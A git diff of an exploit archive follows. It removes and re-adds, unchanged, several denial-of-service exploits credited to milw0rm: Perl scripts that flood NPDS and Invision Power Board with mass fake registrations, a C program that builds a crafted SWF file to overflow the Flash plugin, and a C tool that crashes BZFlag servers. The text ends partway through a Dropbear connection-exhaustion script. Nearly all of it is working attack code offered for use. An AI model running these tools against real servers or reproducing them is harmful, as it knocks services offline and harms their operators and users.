q(";); +print FILE "\n"; print FILE q($x = 0;); +print FILE "\n"; print FILE q(if($nb_reg eq "loop"){$nb_reg = "-5";}); +print FILE "\n"; +print FILE q(while($x != $nb_reg) { +$email = "godman"."$x"."%40hotmail.com"; +$pseudo = "0rrn"."$x"."&"; +$password = "g0_odp4sswd"; +); +if($sendpwd eq "0"){print FILE q($full_url = "$path"."user.php"."?op=only_newuser&uname="."$pseudo"."name=&email="."$email"."&user_avatar=blank.gif&user_icq=&url=&user_from=&user_occ=&user_intrest=&user_sig=&user_aim=&user_yim=&user_msnm=&user_viewemail=&pass="."$password"."&user_lnl=1&C1=&C2=&C3=&C4=&C5=&C6=&C7=&C8=&M1=&M2=&T1=17%2F10%2F2005&T2=&B1=&op=finish";);} +if($sendpwd eq "1"){print FILE q($full_url = "$path"."user.php"."?op=only_newuser&uname="."$pseudo"."name=&email="."$email"."&user_avatar=blank.gif&user_icq=&url=&user_from=&user_occ=&user_intrest=&user_sig=&user_aim=&user_yim=&user_msnm=&user_viewemail=&user_lnl=1&C1=&C2=&C3=&C4=&C5=&C6=&C7=&C8=&M1=&M2=&T1=17%2F10%2F2005&T2=&B1=&op=finish";);} +print FILE q( +my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "$port",Proto => "tcp",); +die "\n[-] Can't connect to the host, maybe Dosed !\n" unless $sock; +print $sock "GET $full_url HTTP/1.1\n"; +print $sock "Host: $host\n"; +close($sock); +if($log eq "1") { +open FILE, ">log_npds_dos.txt"; +print FILE q( ++-----------------------------------+ ++ Net Portal Dynamic System <5.0 + ++ Register multiple users for DoS + ++ ~~Activity logged~~ + ++-----------------------------------+); +print FILE "\n Host| $host"; +print FILE "\n Path| $path"; +print FILE "\n Port| $port"; +print FILE "\n Registration| $x"; +print FILE "\n+-----------------------------------+"; +print FILE "\n+ Logged by DarkFig +"; +print FILE "\n+-----------------------------------+"; +close FILE;} +$x++; +syswrite STDOUT, "-$x";}); close FILE; +print "\n [+] Malicious file generate !"; +print "\n+-----------------------------------+\n"; +exit();} + +#If bind=no +if($bind eq "0") { +print q( ++-----------------------------------+ ++ Net Portal Dynamic System <5.0 + ++ Register multiple users for DoS + ++ Found and coded by DarkFig + ++-----------------------------------+); +print "\n[~] Connecting to the host.."; +my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "$port",Proto => "tcp",); +die "\n[-] Can't connect to the host: $!\n" unless $sock; close($sock); +print "\n[+] Connected !"; +print "\n[~] Sending data..."; +print "\n[+] Number of registration\n"; +while($x != $nb_reg) { +$email = "ownv"."$x"."%40hotmail.com"; +$pseudo = "0orn"."$x"."&"; +$password = "g0_odp4sswd"; +if($sendpwd eq "0"){$full_url = "$path"."user.php"."?op=only_newuser&uname="."$pseudo"."name=&email="."$email"."&user_avatar=blank.gif&user_icq=&url=&user_from=&user_occ=&user_intrest=&user_sig=&user_aim=&user_yim=&user_msnm=&user_viewemail=&pass="."$password"."&user_lnl=1&C1=&C2=&C3=&C4=&C5=&C6=&C7=&C8=&M1=&M2=&T1=17%2F10%2F2005&T2=&B1=&op=finish";} +if($sendpwd eq "1"){$full_url = "$path"."user.php"."?op=only_newuser&uname="."$pseudo"."name=&email="."$email"."&user_avatar=blank.gif&user_icq=&url=&user_from=&user_occ=&user_intrest=&user_sig=&user_aim=&user_yim=&user_msnm=&user_viewemail=&user_lnl=1&C1=&C2=&C3=&C4=&C5=&C6=&C7=&C8=&M1=&M2=&T1=17%2F10%2F2005&T2=&B1=&op=finish";} +my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "$port",Proto => "tcp",); +die "\n[-] Can't connect to the host, maybe Dosed !\n" unless $sock; +print $sock "GET $full_url HTTP/1.1\n"; +print $sock "Host: $host\n"; +close($sock); +if($log eq "1") { +open FILE, ">log_npds_dos.txt"; +print FILE q( ++-----------------------------------+ ++ Net Portal Dynamic System <5.0 + ++ Register multiple users for DoS + ++ ~~Activity logged~~ + ++-----------------------------------+); +print FILE "\n Host| $host"; +print FILE "\n Path| $path"; +print FILE "\n Port| $port"; +print FILE "\n Registration| $x"; +print FILE "\n+-----------------------------------+"; +print FILE "\n+ Logged by DarkFig +"; +print FILE "\n+-----------------------------------+"; +close FILE;} +$x++; +syswrite STDOUT, "-$x";}} + +# milw0rm.com [2005-10-21] diff --git a/platforms/multiple/dos/1331.c b/platforms/multiple/dos/1331.c index 30e00f53a..2ef892cd4 100755 --- a/platforms/multiple/dos/1331.c +++ b/platforms/multiple/dos/1331.c @@ -1,91 +1,91 @@ -/* - - * ********************************************************* * - * Macromedia Flash Plugin - Buffer Overflow in flash.ocx * - * ********************************************************* * - * Version: v7.0.19.0 * - * PoC coded by: BassReFLeX * - * Date: 11 Oct 2005 * - * ********************************************************* * - -*/ - -#include -#include -#include - -void usage(char* file); - -/* - -... - -*/ -char SWF[] = ""; -char SWF_[] = ""; - -//[SetBackgroundColor] -char SetBackgroundColor[] = "\x43\x02\xff\x00\x00"; - -//[DoAction] 1 pwn j00r 455! -char DoAction[] = "\x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00" - "\x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43" - "\x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45" - "\x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00"; - -//[ShowFrame] -char ShowFrame[] = "\x40\x00"; - -//[End] -char End[] = "\x00\x00"; - -int main(int argc,char* argv[]) -{ - system("cls"); - printf("\n* ********************************************************* *"); - printf("\n* Macromedia Flash Plugin - Buffer Overflow in flash.ocx *"); - printf("\n* ********************************************************* *"); - printf("\n* Version: v7.0.19.0 *"); - printf("\n* Date: 11 Oct 2005 *"); - printf("\n* ProofOfConcept(POC) coded by: BassReFLeX *"); - printf("\n* ********************************************************* *"); - - if ( argc!=2 ) - { - usage(argv[0]); - } - - FILE *f; - f = fopen(argv[1],"w"); - if ( !f ) - { - printf("\nFile couldn't open!"); - exit(1); - } - - printf("\n\nWriting crafted .swf file . . ."); - fwrite(SWF,1,sizeof(SWF),f); - fwrite("\n",1,1,f); - fwrite(SetBackgroundColor,1,sizeof(SetBackgroundColor),f); - fwrite("\n",1,1,f); - fwrite(DoAction,1,sizeof(DoAction),f); - fwrite("\n",1,1,f); - fwrite(ShowFrame,1,sizeof(ShowFrame),f); - fwrite("\n",1,1,f); - fwrite(End,1,sizeof(End),f); - fwrite("\n",1,1,f); - fwrite(SWF_,1,sizeof(SWF_),f); - printf("\nFile created successfully!"); - printf("\nFilename: %s",argv[1]); - return 0; -} - -void usage(char* file) -{ - printf("\n\n"); - printf("\n%s ",file); - printf("\n\nFilename = .swf crafted file. Eg: overflow.swf"); - exit(1); -} - -// milw0rm.com [2005-11-18] +/* + + * ********************************************************* * + * Macromedia Flash Plugin - Buffer Overflow in flash.ocx * + * ********************************************************* * + * Version: v7.0.19.0 * + * PoC coded by: BassReFLeX * + * Date: 11 Oct 2005 * + * ********************************************************* * + +*/ + +#include +#include +#include + +void usage(char* file); + +/* + +... + +*/ +char SWF[] = ""; +char SWF_[] = ""; + +//[SetBackgroundColor] +char SetBackgroundColor[] = "\x43\x02\xff\x00\x00"; + +//[DoAction] 1 pwn j00r 455! +char DoAction[] = "\x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00" + "\x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43" + "\x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45" + "\x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00"; + +//[ShowFrame] +char ShowFrame[] = "\x40\x00"; + +//[End] +char End[] = "\x00\x00"; + +int main(int argc,char* argv[]) +{ + system("cls"); + printf("\n* ********************************************************* *"); + printf("\n* Macromedia Flash Plugin - Buffer Overflow in flash.ocx *"); + printf("\n* ********************************************************* *"); + printf("\n* Version: v7.0.19.0 *"); + printf("\n* Date: 11 Oct 2005 *"); + printf("\n* ProofOfConcept(POC) coded by: BassReFLeX *"); + printf("\n* ********************************************************* *"); + + if ( argc!=2 ) + { + usage(argv[0]); + } + + FILE *f; + f = fopen(argv[1],"w"); + if ( !f ) + { + printf("\nFile couldn't open!"); + exit(1); + } + + printf("\n\nWriting crafted .swf file . . ."); + fwrite(SWF,1,sizeof(SWF),f); + fwrite("\n",1,1,f); + fwrite(SetBackgroundColor,1,sizeof(SetBackgroundColor),f); + fwrite("\n",1,1,f); + fwrite(DoAction,1,sizeof(DoAction),f); + fwrite("\n",1,1,f); + fwrite(ShowFrame,1,sizeof(ShowFrame),f); + fwrite("\n",1,1,f); + fwrite(End,1,sizeof(End),f); + fwrite("\n",1,1,f); + fwrite(SWF_,1,sizeof(SWF_),f); + printf("\nFile created successfully!"); + printf("\nFilename: %s",argv[1]); + return 0; +} + +void usage(char* file) +{ + printf("\n\n"); + printf("\n%s ",file); + printf("\n\nFilename = .swf crafted file. Eg: overflow.swf"); + exit(1); +} + +// milw0rm.com [2005-11-18] diff --git a/platforms/multiple/dos/1390.c b/platforms/multiple/dos/1390.c index 851bd90c1..690e5b9a2 100755 --- a/platforms/multiple/dos/1390.c +++ b/platforms/multiple/dos/1390.c @@ -1,366 +1,366 @@ -/* - -by Luigi Auriemma - -*/ - -#include -#include -#include -#include -#include - -#ifdef WIN32 - #include -/* - Header file used for manage errors in Windows - It support socket and errno too - (this header replace the previous sock_errX.h) -*/ - -#include -#include - - - -void std_err(void) { - char *error; - - switch(WSAGetLastError()) { - case 10004: error = "Interrupted system call"; break; - case 10009: error = "Bad file number"; break; - case 10013: error = "Permission denied"; break; - case 10014: error = "Bad address"; break; - case 10022: error = "Invalid argument (not bind)"; break; - case 10024: error = "Too many open files"; break; - case 10035: error = "Operation would block"; break; - case 10036: error = "Operation now in progress"; break; - case 10037: error = "Operation already in progress"; break; - case 10038: error = "Socket operation on non-socket"; break; - case 10039: error = "Destination address required"; break; - case 10040: error = "Message too long"; break; - case 10041: error = "Protocol wrong type for socket"; break; - case 10042: error = "Bad protocol option"; break; - case 10043: error = "Protocol not supported"; break; - case 10044: error = "Socket type not supported"; break; - case 10045: error = "Operation not supported on socket"; break; - case 10046: error = "Protocol family not supported"; break; - case 10047: error = "Address family not supported by protocol family"; break; - case 10048: error = "Address already in use"; break; - case 10049: error = "Can't assign requested address"; break; - case 10050: error = "Network is down"; break; - case 10051: error = "Network is unreachable"; break; - case 10052: error = "Net dropped connection or reset"; break; - case 10053: error = "Software caused connection abort"; break; - case 10054: error = "Connection reset by peer"; break; - case 10055: error = "No buffer space available"; break; - case 10056: error = "Socket is already connected"; break; - case 10057: error = "Socket is not connected"; break; - case 10058: error = "Can't send after socket shutdown"; break; - case 10059: error = "Too many references, can't splice"; break; - case 10060: error = "Connection timed out"; break; - case 10061: error = "Connection refused"; break; - case 10062: error = "Too many levels of symbolic links"; break; - case 10063: error = "File name too long"; break; - case 10064: error = "Host is down"; break; - case 10065: error = "No Route to Host"; break; - case 10066: error = "Directory not empty"; break; - case 10067: error = "Too many processes"; break; - case 10068: error = "Too many users"; break; - case 10069: error = "Disc Quota Exceeded"; break; - case 10070: error = "Stale NFS file handle"; break; - case 10091: error = "Network SubSystem is unavailable"; break; - case 10092: error = "WINSOCK DLL Version out of range"; break; - case 10093: error = "Successful WSASTARTUP not yet performed"; break; - case 10071: error = "Too many levels of remote in path"; break; - case 11001: error = "Host not found"; break; - case 11002: error = "Non-Authoritative Host not found"; break; - case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break; - case 11004: error = "Valid name, no data record of requested type"; break; - default: error = strerror(errno); break; - } - fprintf(stderr, "\nError: %s\n", error); - exit(1); -} - -// combined winerr.h /str0ke - - #define close closesocket -#else - #include - #include - #include - #include - #include - #include -#endif - - - -#define VER "0.1" -#define BUFFSZ 0xffff -#define PORT 5154 -#define TIMEOUT 8 - -#define WAITSEC 5 -#define CALLSIGNSZ 32 -#define MAILSZ 128 -#define TOKENSZ 22 -#define VERSIONSZ 60 -#define TYPE "\x00\x00" -#define TEAM "\xff\xfe" // autoteam - - - -int bzflag_send(int sd, u_char *buff, u_char *code, ...); -int tcp_recv(int sd, u_char *data, int len); -u_short bzflag_recv(int sd, u_char *buff, u_char *code); -int create_rand_string(u_char *data, int len, u_int *seed); -int timeout(int sock, int secs); -u_int resolv(char *host); -void std_err(void); - - - -int main(int argc, char *argv[]) { - struct sockaddr_in peer; - u_int seed; - int sd; - u_short port = PORT, - len; - u_char buff[BUFFSZ], - callsign[CALLSIGNSZ + 1], - mail[MAILSZ + 1], - token[TOKENSZ + 1], - version[VERSIONSZ + 1], - code[2]; - -#ifdef WIN32 - WSADATA wsadata; - WSAStartup(MAKEWORD(1,0), &wsadata); -#endif - - - setbuf(stdout, NULL); - - fputs("\n" - "BZFlag <= 2.0.4 (2.x) server crash "VER"\n" - "by Luigi Auriemma\n" - "e-mail: aluigi@autistici.org\n" - "web: http://aluigi.altervista.org\n" - "\n", stdout); - - if(argc < 2) { - printf("\n" - "Usage: %s [port(%hu)]\n" - "\n" - " This tool works also versus servers protected by password without knowing the\n" - " keyword!\n" - "\n", argv[0], port); - exit(1); - } - - if(argc > 2) port = atoi(argv[2]); - - peer.sin_addr.s_addr = resolv(argv[1]); - peer.sin_port = htons(port); - peer.sin_family = AF_INET; - - printf("- target %s : %hu\n", - inet_ntoa(peer.sin_addr), port); - - fputs("- check server version: ", stdout); - sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); - if(sd < 0) std_err(); - if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) - < 0) std_err(); - if(timeout(sd, TIMEOUT) < 0) { - printf("\nError: no reply received within %d seconds, this server doesn't seem valid\n\n", TIMEOUT); - exit(1); - } - tcp_recv(sd, buff, 9); - - printf(" %s\n", buff); - if(memcmp(buff, "BZFS", 4)) { - fputs("- this server doesn't seem a valid BZFlag server, I try to continue\n", stdout); - } else { - if(memcmp(buff + 4, "00", 2)) { - fputs("- this server uses a version which is not vulnerable, I try to continue\n", stdout); - } - } - - if(!timeout(sd, 0)) { // 2.0.4 sends data while the previous 2.0 not - len = bzflag_recv(sd, buff, code); - } - - create_rand_string(callsign, CALLSIGNSZ, &seed); // <=== THE BUG IS HERE - create_rand_string(mail, MAILSZ, &seed); - create_rand_string(token, TOKENSZ, &seed); - create_rand_string(version, VERSIONSZ, &seed); - - bzflag_send(sd, - buff, - "en", - 2, TYPE, - 2, TEAM, - CALLSIGNSZ, callsign, - MAILSZ, mail, - TOKENSZ, token, - VERSIONSZ, version, - 0); - - len = bzflag_recv(sd, buff, code); - - if(memcmp(code, "ac", 2)) { - buff[len] = 0; - printf("\n" - "Error: code \"%.2s\"\n" - "%s\n" - "\n", - code, buff + 2); - } - - close(sd); - - fputs("- check server:\n", stdout); - sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); - if(sd < 0) std_err(); - if( - (connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) || - (timeout(sd, 3) < 0)) { - fputs("\n Server IS vulnerable!!!\n\n", stdout); - } else { - fputs("\n" - " Server doesn't seem vulnerable\n" - " RELAUNCH THIS TOOL OTHER TIMES UNTIL YOU ARE UNABLE TO CRASH IT!!!\n" - "\n", stdout); - } - close(sd); - return(0); -} - - - -int bzflag_send(int sd, u_char *buff, u_char *code, ...) { - va_list ap; - int len; - u_short *blen; - u_char *s, - *p; - - blen = (u_short *)buff; - memcpy(buff + 2, code, 2); - p = buff + 4; - - va_start(ap, code); - while((len = va_arg(ap, int))) { - s = va_arg(ap, u_char *); - memcpy(p, s, len); - p += len; - } - va_end(ap); - - *blen = htons(p - (buff + 4)); - - len = send(sd, buff, p - buff, 0); - return(len); -} - - - -int tcp_recv(int sd, u_char *data, int len) { - int t; - - while(len) { - t = recv(sd, data, len, 0); - if(t <= 0) return(-1); - data += t; - len -= t; - } - - return(0); -} - - - -u_short bzflag_recv(int sd, u_char *buff, u_char *code) { - u_short len; - - tcp_recv(sd, (u_char *)&len, 2); - len = ntohs(len); - - tcp_recv(sd, code, 2); - - tcp_recv(sd, buff, len); - - return(len); -} - - - -int create_rand_string(u_char *data, int len, u_int *seed) { - u_int rnd; - u_char *p = data; - const static u_char table[] = - "0123456789" - "ABCDEFGHIJKLMNOPQRSTUVWXYZ" - "abcdefghijklmnopqrstuvwxyz"; - - rnd = *seed; -// len = rnd % len; // max length! -// if(len < 3) len = 3; - - while(len--) { - rnd = (rnd * 0x343FD) + 0x269EC3; - *p++ = table[rnd % (sizeof(table) - 1)]; - } - *p = 0; - - *seed = rnd; - return(p - data); -} - - - -int timeout(int sock, int secs) { - struct timeval tout; - fd_set fd_read; - int err; - - tout.tv_sec = secs; - tout.tv_usec = 1000; // in case secs is 0 - FD_ZERO(&fd_read); - FD_SET(sock, &fd_read); - err = select(sock + 1, &fd_read, NULL, NULL, &tout); - if(err < 0) std_err(); - if(!err) return(-1); - return(0); -} - - - -u_int resolv(char *host) { - struct hostent *hp; - u_int host_ip; - - host_ip = inet_addr(host); - if(host_ip == INADDR_NONE) { - hp = gethostbyname(host); - if(!hp) { - printf("\nError: Unable to resolv hostname (%s)\n", host); - exit(1); - } else host_ip = *(u_int *)hp->h_addr; - } - return(host_ip); -} - - - -#ifndef WIN32 - void std_err(void) { - perror("\nError"); - exit(1); - } -#endif - -// milw0rm.com [2005-12-27] +/* + +by Luigi Auriemma + +*/ + +#include +#include +#include +#include +#include + +#ifdef WIN32 + #include +/* + Header file used for manage errors in Windows + It support socket and errno too + (this header replace the previous sock_errX.h) +*/ + +#include +#include + + + +void std_err(void) { + char *error; + + switch(WSAGetLastError()) { + case 10004: error = "Interrupted system call"; break; + case 10009: error = "Bad file number"; break; + case 10013: error = "Permission denied"; break; + case 10014: error = "Bad address"; break; + case 10022: error = "Invalid argument (not bind)"; break; + case 10024: error = "Too many open files"; break; + case 10035: error = "Operation would block"; break; + case 10036: error = "Operation now in progress"; break; + case 10037: error = "Operation already in progress"; break; + case 10038: error = "Socket operation on non-socket"; break; + case 10039: error = "Destination address required"; break; + case 10040: error = "Message too long"; break; + case 10041: error = "Protocol wrong type for socket"; break; + case 10042: error = "Bad protocol option"; break; + case 10043: error = "Protocol not supported"; break; + case 10044: error = "Socket type not supported"; break; + case 10045: error = "Operation not supported on socket"; break; + case 10046: error = "Protocol family not supported"; break; + case 10047: error = "Address family not supported by protocol family"; break; + case 10048: error = "Address already in use"; break; + case 10049: error = "Can't assign requested address"; break; + case 10050: error = "Network is down"; break; + case 10051: error = "Network is unreachable"; break; + case 10052: error = "Net dropped connection or reset"; break; + case 10053: error = "Software caused connection abort"; break; + case 10054: error = "Connection reset by peer"; break; + case 10055: error = "No buffer space available"; break; + case 10056: error = "Socket is already connected"; break; + case 10057: error = "Socket is not connected"; break; + case 10058: error = "Can't send after socket shutdown"; break; + case 10059: error = "Too many references, can't splice"; break; + case 10060: error = "Connection timed out"; break; + case 10061: error = "Connection refused"; break; + case 10062: error = "Too many levels of symbolic links"; break; + case 10063: error = "File name too long"; break; + case 10064: error = "Host is down"; break; + case 10065: error = "No Route to Host"; break; + case 10066: error = "Directory not empty"; break; + case 10067: error = "Too many processes"; break; + case 10068: error = "Too many users"; break; + case 10069: error = "Disc Quota Exceeded"; break; + case 10070: error = "Stale NFS file handle"; break; + case 10091: error = "Network SubSystem is unavailable"; break; + case 10092: error = "WINSOCK DLL Version out of range"; break; + case 10093: error = "Successful WSASTARTUP not yet performed"; break; + case 10071: error = "Too many levels of remote in path"; break; + case 11001: error = "Host not found"; break; + case 11002: error = "Non-Authoritative Host not found"; break; + case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break; + case 11004: error = "Valid name, no data record of requested type"; break; + default: error = strerror(errno); break; + } + fprintf(stderr, "\nError: %s\n", error); + exit(1); +} + +// combined winerr.h /str0ke + + #define close closesocket +#else + #include + #include + #include + #include + #include + #include +#endif + + + +#define VER "0.1" +#define BUFFSZ 0xffff +#define PORT 5154 +#define TIMEOUT 8 + +#define WAITSEC 5 +#define CALLSIGNSZ 32 +#define MAILSZ 128 +#define TOKENSZ 22 +#define VERSIONSZ 60 +#define TYPE "\x00\x00" +#define TEAM "\xff\xfe" // autoteam + + + +int bzflag_send(int sd, u_char *buff, u_char *code, ...); +int tcp_recv(int sd, u_char *data, int len); +u_short bzflag_recv(int sd, u_char *buff, u_char *code); +int create_rand_string(u_char *data, int len, u_int *seed); +int timeout(int sock, int secs); +u_int resolv(char *host); +void std_err(void); + + + +int main(int argc, char *argv[]) { + struct sockaddr_in peer; + u_int seed; + int sd; + u_short port = PORT, + len; + u_char buff[BUFFSZ], + callsign[CALLSIGNSZ + 1], + mail[MAILSZ + 1], + token[TOKENSZ + 1], + version[VERSIONSZ + 1], + code[2]; + +#ifdef WIN32 + WSADATA wsadata; + WSAStartup(MAKEWORD(1,0), &wsadata); +#endif + + + setbuf(stdout, NULL); + + fputs("\n" + "BZFlag <= 2.0.4 (2.x) server crash "VER"\n" + "by Luigi Auriemma\n" + "e-mail: aluigi@autistici.org\n" + "web: http://aluigi.altervista.org\n" + "\n", stdout); + + if(argc < 2) { + printf("\n" + "Usage: %s [port(%hu)]\n" + "\n" + " This tool works also versus servers protected by password without knowing the\n" + " keyword!\n" + "\n", argv[0], port); + exit(1); + } + + if(argc > 2) port = atoi(argv[2]); + + peer.sin_addr.s_addr = resolv(argv[1]); + peer.sin_port = htons(port); + peer.sin_family = AF_INET; + + printf("- target %s : %hu\n", + inet_ntoa(peer.sin_addr), port); + + fputs("- check server version: ", stdout); + sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + if(sd < 0) std_err(); + if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) + < 0) std_err(); + if(timeout(sd, TIMEOUT) < 0) { + printf("\nError: no reply received within %d seconds, this server doesn't seem valid\n\n", TIMEOUT); + exit(1); + } + tcp_recv(sd, buff, 9); + + printf(" %s\n", buff); + if(memcmp(buff, "BZFS", 4)) { + fputs("- this server doesn't seem a valid BZFlag server, I try to continue\n", stdout); + } else { + if(memcmp(buff + 4, "00", 2)) { + fputs("- this server uses a version which is not vulnerable, I try to continue\n", stdout); + } + } + + if(!timeout(sd, 0)) { // 2.0.4 sends data while the previous 2.0 not + len = bzflag_recv(sd, buff, code); + } + + create_rand_string(callsign, CALLSIGNSZ, &seed); // <=== THE BUG IS HERE + create_rand_string(mail, MAILSZ, &seed); + create_rand_string(token, TOKENSZ, &seed); + create_rand_string(version, VERSIONSZ, &seed); + + bzflag_send(sd, + buff, + "en", + 2, TYPE, + 2, TEAM, + CALLSIGNSZ, callsign, + MAILSZ, mail, + TOKENSZ, token, + VERSIONSZ, version, + 0); + + len = bzflag_recv(sd, buff, code); + + if(memcmp(code, "ac", 2)) { + buff[len] = 0; + printf("\n" + "Error: code \"%.2s\"\n" + "%s\n" + "\n", + code, buff + 2); + } + + close(sd); + + fputs("- check server:\n", stdout); + sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + if(sd < 0) std_err(); + if( + (connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) || + (timeout(sd, 3) < 0)) { + fputs("\n Server IS vulnerable!!!\n\n", stdout); + } else { + fputs("\n" + " Server doesn't seem vulnerable\n" + " RELAUNCH THIS TOOL OTHER TIMES UNTIL YOU ARE UNABLE TO CRASH IT!!!\n" + "\n", stdout); + } + close(sd); + return(0); +} + + + +int bzflag_send(int sd, u_char *buff, u_char *code, ...) { + va_list ap; + int len; + u_short *blen; + u_char *s, + *p; + + blen = (u_short *)buff; + memcpy(buff + 2, code, 2); + p = buff + 4; + + va_start(ap, code); + while((len = va_arg(ap, int))) { + s = va_arg(ap, u_char *); + memcpy(p, s, len); + p += len; + } + va_end(ap); + + *blen = htons(p - (buff + 4)); + + len = send(sd, buff, p - buff, 0); + return(len); +} + + + +int tcp_recv(int sd, u_char *data, int len) { + int t; + + while(len) { + t = recv(sd, data, len, 0); + if(t <= 0) return(-1); + data += t; + len -= t; + } + + return(0); +} + + + +u_short bzflag_recv(int sd, u_char *buff, u_char *code) { + u_short len; + + tcp_recv(sd, (u_char *)&len, 2); + len = ntohs(len); + + tcp_recv(sd, code, 2); + + tcp_recv(sd, buff, len); + + return(len); +} + + + +int create_rand_string(u_char *data, int len, u_int *seed) { + u_int rnd; + u_char *p = data; + const static u_char table[] = + "0123456789" + "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + "abcdefghijklmnopqrstuvwxyz"; + + rnd = *seed; +// len = rnd % len; // max length! +// if(len < 3) len = 3; + + while(len--) { + rnd = (rnd * 0x343FD) + 0x269EC3; + *p++ = table[rnd % (sizeof(table) - 1)]; + } + *p = 0; + + *seed = rnd; + return(p - data); +} + + + +int timeout(int sock, int secs) { + struct timeval tout; + fd_set fd_read; + int err; + + tout.tv_sec = secs; + tout.tv_usec = 1000; // in case secs is 0 + FD_ZERO(&fd_read); + FD_SET(sock, &fd_read); + err = select(sock + 1, &fd_read, NULL, NULL, &tout); + if(err < 0) std_err(); + if(!err) return(-1); + return(0); +} + + + +u_int resolv(char *host) { + struct hostent *hp; + u_int host_ip; + + host_ip = inet_addr(host); + if(host_ip == INADDR_NONE) { + hp = gethostbyname(host); + if(!hp) { + printf("\nError: Unable to resolv hostname (%s)\n", host); + exit(1); + } else host_ip = *(u_int *)hp->h_addr; + } + return(host_ip); +} + + + +#ifndef WIN32 + void std_err(void) { + perror("\nError"); + exit(1); + } +#endif + +// milw0rm.com [2005-12-27] diff --git a/platforms/multiple/dos/1489.pl b/platforms/multiple/dos/1489.pl index da00d661b..79a07c0c2 100755 --- a/platforms/multiple/dos/1489.pl +++ b/platforms/multiple/dos/1489.pl @@ -1,46 +1,46 @@ -#!/usr/bin/perl -use IO::Socket; -########################################################## -## _______ _______ ______ # -## |______ |______ | \ # -## ______| |______ |_____/ # -## # -##IPB Register Multiple Users Denial of Service # -##Doesn't Work on forums using "Code Confirmation" # -##Created By SkOd # -##SED security Team # -##http://www.sed-team.be # -##skod.uk@gmail.com # -##ISRAEL # -########################################################## - -print q{ -############################################################ -# Invision Power Board Multiple Users DOS # -# Tested on IPB 2.0.1 # -# created By SkOd. SED Security Team # -############################################################ -}; -$rand=rand(10); -print "Forum Host: "; -$serv = ; -chop ($serv); -print "Forum Path: "; -$path = ; -chop ($path); -for ($i=0; $i<9999; $i++) -{ -$name="sedXPL_".$rand.$i; -$data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sedbotbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1&allow_member_mail=1&day=11&month=11&year=1985&agree=1"; -$len = length $data; -$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed"; -print $get1 "POST ".$path."index.php HTTP/1.0\n"; -print $get1 "Host: ".$serv."\n"; -print $get1 "Content-Type: application/x-www-form-urlencoded\n"; -print $get1 "Content-Length: ".$len."\n\n"; -print $get1 $data; -syswrite STDOUT, "+"; -} -print "Forum shuld be Dosed. Check it out...\n"; - -# milw0rm.com [2006-02-10] +#!/usr/bin/perl +use IO::Socket; +########################################################## +## _______ _______ ______ # +## |______ |______ | \ # +## ______| |______ |_____/ # +## # +##IPB Register Multiple Users Denial of Service # +##Doesn't Work on forums using "Code Confirmation" # +##Created By SkOd # +##SED security Team # +##http://www.sed-team.be # +##skod.uk@gmail.com # +##ISRAEL # +########################################################## + +print q{ +############################################################ +# Invision Power Board Multiple Users DOS # +# Tested on IPB 2.0.1 # +# created By SkOd. SED Security Team # +############################################################ +}; +$rand=rand(10); +print "Forum Host: "; +$serv = ; +chop ($serv); +print "Forum Path: "; +$path = ; +chop ($path); +for ($i=0; $i<9999; $i++) +{ +$name="sedXPL_".$rand.$i; +$data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sedbotbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1&allow_member_mail=1&day=11&month=11&year=1985&agree=1"; +$len = length $data; +$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed"; +print $get1 "POST ".$path."index.php HTTP/1.0\n"; +print $get1 "Host: ".$serv."\n"; +print $get1 "Content-Type: application/x-www-form-urlencoded\n"; +print $get1 "Content-Length: ".$len."\n\n"; +print $get1 $data; +syswrite STDOUT, "+"; +} +print "Forum shuld be Dosed. Check it out...\n"; + +# milw0rm.com [2006-02-10] diff --git a/platforms/multiple/dos/1572.pl b/platforms/multiple/dos/1572.pl index 8dacf1818..790ead8bb 100755 --- a/platforms/multiple/dos/1572.pl +++ b/platforms/multiple/dos/1572.pl @@ -1,64 +1,64 @@ -#!/usr/bin/perl -## I needed a working test script so here it is. -## just a keep alive thread, I had a few problems with Pablo's code running properly. -## -## Straight from Pablo Fernandez's advisory: -# Vulnerable code is in svr-main.c -# -# /* check for max number of connections not authorised */ -# for (j = 0; j < MAX_UNAUTH_CLIENTS; j++) { -# if (childpipes[j] < 0) { -# break; -# } -# } -# -# if (j == MAX_UNAUTH_CLIENTS) { -# /* no free connections */ -# /* TODO - possibly log, though this would be an easy way -# * to fill logs/disk */ -# close(childsock); -# continue; -# } -## /str0ke (milw0rm.com) - -use IO::Socket; -use Thread; -use strict; - -# thanks to Perl Underground for my moronic coding style fixes. -my ($serv, $port, $time) 